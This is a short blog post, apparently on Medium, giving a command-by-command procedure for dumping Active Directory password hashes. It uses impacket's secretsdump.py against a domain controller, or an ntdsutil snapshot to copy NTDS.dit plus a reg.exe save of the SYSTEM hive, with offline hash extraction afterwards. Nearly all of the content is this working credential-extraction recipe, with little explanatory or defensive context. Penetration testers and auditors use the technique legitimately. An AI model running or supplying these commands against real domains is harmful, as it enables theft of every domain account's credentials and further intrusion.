Dumping Active Directory Password Hashes

pip install pyasn1
pip install impacket
secretsdump.py -just-dc-ntlm <DOMAIN>/<USER>@<DOMAIN_CONTROLLER>

Alternative Approach

  • Run cmd.exe as Administrator on the domain controller.
  • Run ntdsutil and type the following commands:
snapshot
activate instance NTDS
create
  • This will create a snapshot and show you the UUID of the newly created snapshot. ntdsutil is using Volume Shadow Copy for the snapshot creation, but also ensures the database consistency. Use the UUID for the following command:
mount <UUID>
  • The output will show the path where the snapshot was mounted. Start another cmd.exe as Administrator and copy NTDS.dit (located in Windows\NTDS\NTDS.dit by default).
  • Create a copy of the SYSTEM registry hive:
reg.exe save HKLM\SYSTEM <path_where_you_want_to_save_it>
  • Go back to the cmd.exe window with ntdsutil running, and unmount (and optionally delete) the snapshot and exit:
unmount <UUID>
delete <UUID>
quit
quit
  • Using the two saved files (NTDS.dit and SYSTEM registry hive) you can use the same secretsdump.py script to extract password hashes offline (doesn’t need to be done on the domain controller):
secretsdump.py -system <path_to_system_hive> -ntds <path_to_ntds.dit> LOCAL

--

--

--

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.

Love podcasts or audiobooks? Learn on the go with our new app.

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Airman

Airman

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.

More from Medium

WEB APPLICATION VULNERABILTY

How simple file upload vulnerability leads to RCE?

How simple file upload vulnerability leads to RCE?

Top 10 Web Application Vulnerabilities Pt. 1

Recon-ng: Powerful Reconaissance Tool